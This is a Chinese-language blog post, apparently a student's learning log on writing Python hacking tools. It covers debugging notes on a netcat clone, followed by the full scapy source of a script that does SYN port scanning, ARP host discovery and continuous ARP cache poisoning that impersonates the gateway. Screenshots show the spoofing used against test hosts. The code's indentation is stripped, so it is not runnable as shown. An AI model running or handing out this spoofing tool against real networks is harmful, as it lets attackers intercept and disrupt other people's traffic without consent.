Python木马编写
遇到的问题和解决办法
开始是netcat.py文件,这个文件是准备模仿一部分kali工具net cat编写的
遇到了一个问题,代码写完跑不出来,脚本带参数也没法调试,通过添加print逐一排错,发现是socket中的recv函数的阻塞问题
即有两种模式阻塞与非阻塞
阻塞模式下:当缓冲区内有数据时,立即返回所有的数据;当缓冲区内无数据时,阻塞直到缓冲区中有数据。
非阻塞模式:当缓冲区内有数据时,立即返回所有的数据;当缓冲区内无数据时,产生EAGAIN的错误并返回(在Python中会抛出一个异常)
报错如下
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Cuwm3Flz-1646818460819)(Python木马编写.assets/image-20200622102258185.png)]](https://img-blog.csdnimg.cn/cf608caabf8849cebdc1299d72cd166c.png)
官方说明
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ydS6A6In-1646818460820)(Python木马编写.assets/image-20200622102326248.png)]](https://img-blog.csdnimg.cn/9726903886ea412ea8c74d020bbe1f30.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQW1pcmUweA==,size_20,color_FFFFFF,t_70,g_se,x_16)
远程主机强行close()
网上查了查办法貌似没啥用
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8PElD3i7-1646818460821)(Python木马编写.assets/image-20200622180333497.png)]](https://img-blog.csdnimg.cn/643c7f0787f04fa4b52977def87b8a9c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQW1pcmUweA==,size_20,color_FFFFFF,t_70,g_se,x_16)
但是通过这个我发现服务端没有数据传过来
找了半天原因
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Lj3XIpTt-1646818460822)(Python木马编写.assets/image-20200622103106215.png)]](https://img-blog.csdnimg.cn/ded27f6fc2dc457cab741531cefcaa50.png)
我也不知道这个我是怎么写出来的,淦!
不久又出现这个错误,找了很久原因
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1TpUveN4-1646818460822)(Python木马编写.assets/image-20200622151049124.png)]](https://img-blog.csdnimg.cn/4bfde85e0db245a79a868249dab17959.png)
在本机可以完美运行,但是跨机就不行了,查了很多资料不行
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OLAZxVX7-1646818460823)(Python木马编写.assets/image-20200622180311682.png)]](https://img-blog.csdnimg.cn/39bb49f250964a50a168e5bcbd8b45f8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQW1pcmUweA==,size_20,color_FFFFFF,t_70,g_se,x_16)
肝了两天没结果,只得暂时放弃留作后面思考
然后使用到的模块学习netifaces
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CIIByy4e-1646818460824)(Python木马编写.assets/image-20200622205043049.png)]](https://img-blog.csdnimg.cn/f8105f56face454f95e827cf64fb84b4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQW1pcmUweA==,size_20,color_FFFFFF,t_70,g_se,x_16)
新问题
在使用arpspoof时
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FN7tgU4W-1646818460825)(Python木马编写.assets/image-20200623112723945.png)]](https://img-blog.csdnimg.cn/8b70ad5b5dc8403393e9ebee9b18960c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQW1pcmUweA==,size_20,color_FFFFFF,t_70,g_se,x_16)
报错
int()函数只能转化数字组成的字符串
估计这里是mac地方出了问题
找了很久,通过添加代码发现
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-p3KJI1gj-1646818460825)(Python木马编写.assets/image-20200623115343632.png)]](https://img-blog.csdnimg.cn/0156f8d5e1db4790b10ecfcf15edbffb.png)
我的全局变量没有值,是空白的
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZfuWpkx0-1646818460826)(Python木马编写.assets/image-20200623115411015.png)]](https://img-blog.csdnimg.cn/923b1001edfe4b01ae041fb579eabc5e.png)
但是我没发现原因,后面找了很久
发现我代码逻辑有点问题, 最后通过添加了一部分代码解决好的
运行过程
最后写出来个这个 ip_manager.py
来看看效果
synscan
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nwPOoAr1-1646818460826)(Python木马编写.assets/image-20200623130734985.png)]](https://img-blog.csdnimg.cn/72efd8456e414bfba2fbece331c919bb.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQW1pcmUweA==,size_20,color_FFFFFF,t_70,g_se,x_16)
arping
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kgE9ovKb-1646818460827)(Python木马编写.assets/image-20200622175917876.png)]](https://img-blog.csdnimg.cn/1b3339cbedb64b638112253824322ff2.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQW1pcmUweA==,size_20,color_FFFFFF,t_70,g_se,x_16)
arpspoof
原
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ldqHgnJE-1646818460827)(Python木马编写.assets/image-20200623130811763.png)]](https://img-blog.csdnimg.cn/ceef5697a4c64b2fa11e43fb49af48cc.png)
攻击
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-khcWuzjl-1646818460827)(Python木马编写.assets/image-20200623130844547.png)]](https://img-blog.csdnimg.cn/3292643738f6465f931c5a23d7702ad7.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQW1pcmUweA==,size_20,color_FFFFFF,t_70,g_se,x_16)
结果
linux
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GcP2jnPZ-1646818460828)(Python木马编写.assets/image-20200623131334624.png)]](https://img-blog.csdnimg.cn/b6e9aab124a04e8eba03e1af17151f18.png)
windows
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DuAoqN9a-1646818460828)(Python木马编写.assets/image-20200623133145513.png)]](https://img-blog.csdnimg.cn/0f28f8e5107a4f2eb109de0f0bac2da1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQW1pcmUweA==,size_20,color_FFFFFF,t_70,g_se,x_16)
完整代码
#! /usr/bin/env python
# -*- coding:utf-8 -*-
import sys
import getopt
import time
import netifaces
from scapy.all import *
target = ""
scan_type = ""
port = 0
gateway = ""
# 帮助函数
def help_message():
print
print "You can manage your ip like this:"
print " ip_manager.py -t target_ip -p port --scan_type=type"
print "[*]example:python ip_manager.py -t 127.0.0.1 -p 7777 --scantype==syn_scan"
print
print "-t specify the ip you wanna scan"
print
print "-p specify the port you wanna scan"
print
print "-i to get host network card information"
print
print "--scan_type= specify the scan type you wanna use"
print
print"scantype:[syn_scan,arp_ping,arp_spoof]"
print "[*]example:python ip_manager.py -t 127.0.0.1 -p 80 --scan_type=syn_scan "
# 获取本机网卡信息
def information():
print "Net Card Information:"
gateway = netifaces.gateways()['default'][2][0]
nic_name = netifaces.gateways()['default'][2][1]
for interface in netifaces.interfaces():
if interface == nic_name:
ip = netifaces.ifaddresses('eth0')[2][0]['addr']
mac_addr = netifaces.ifaddresses('eth0')[17][0]['addr']
ip_mask = netifaces.ifaddresses('eth0')[2][0]['netmask']
print "Gateway:",gateway
print "NIC Name:",nic_name
print "NIC MAC Address:",mac_addr
print "IPV4 Address:", ip
print "IP Netmask:",ip_mask
return mac_addr,gateway, nic_name
def main():
global target
global scan_type
global port
global gateway
# 解析函数
try:
opts, args = getopt.getopt(sys.argv[1:], "t:s:p:hi",
["target=", "scan_type=", "help","info", "port="])
except Exception as e:
print str(e)
help_message()
sys.exit(0)
for opt, value in opts:
if opt in ["-h", "--help"]:
help_message()
elif opt in ["-t", "--target"]:
target = value
elif opt in ["-s","--scan_type"]:
scan_type = value
elif opt in ["-p", "--port"]:
port = int(value)
elif opt in ["-i","--info"]:
information()
if scan_type == "syn_scan":
syn_scan()
elif scan_type == "arp_ping":
arp_ping()
elif scan_type == "arp_spoof":
arp_spoof()
# syn扫描端口
def syn_scan():
global target
global port
ports = [20,21,22,23,25,69,80,81,109,389,443,1433,1521,2049,3306,3389,5432,8080,27017]
if port:
ans, unans = sr(IP(dst = target)/TCP(sport=RandShort(),dport=port),timeout=3)
else:
ans, unans = sr(IP(dst = target)/TCP(sport=RandShort(),dport=ports),timeout=3)
for sent,received in ans:
if received.haslayer(TCP) and str(received[TCP].flags) == "SA":
print "Port " + str(sent[TCP].dport) + " of " + target + " is OPEN!"
elif received.haslayer(TCP) and str(received[TCP].flags) == "RA":
print "Port " + str(sent[TCP].dport) + " of " + target + " is closed!"
elif received.haslayer(ICMP) and str(received[ICMP].type) == "3":
print "Port " + str(sent[TCP].dport) + " of " + target + " is filtered!"
for sent in unans:
print str(sent[TCP].dport) + " is unanswered!"
sys.exit(0)
# arp存活主机扫描
def arp_ping():
global target
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=target),timeout=3)
for sent, received in ans:
print received[Ether].src+"->"+received[ARP].psrc+" is alive"
sys.exit(0)
# arp欺骗
def arp_spoof():
global target
mac_addr,gateway, nic_name=information()
# 获取目标mac地址
target_mac = getmacbyip(target)
if target_mac is None:
print("[-] Error: Could not resolve targets MAC address")
sys.exit(1)
print "ARP Spoofing..."
# 构造响应包
pkt = Ether(src=mac_addr, dst=target_mac) / ARP(hwsrc=mac_addr, psrc=gateway, hwdst=target_mac, pdst=target)
while True:
sendp(pkt, inter=2, iface=nic_name)
if __name__ == "__main__":
main()
参考
《python黑帽子编程 黑客与渗透测试编程》
参考链接
Scapy-port-scanner/port_scanner.py at master · cptpugwash/Scapy-port-scanner · GitHub
python scapy的用法之ARP主机扫描和ARP欺骗 - 雨中落叶 - 博客园
python scapy的用法之ARP主机扫描和ARP欺骗 - 雨中落叶 - 博客园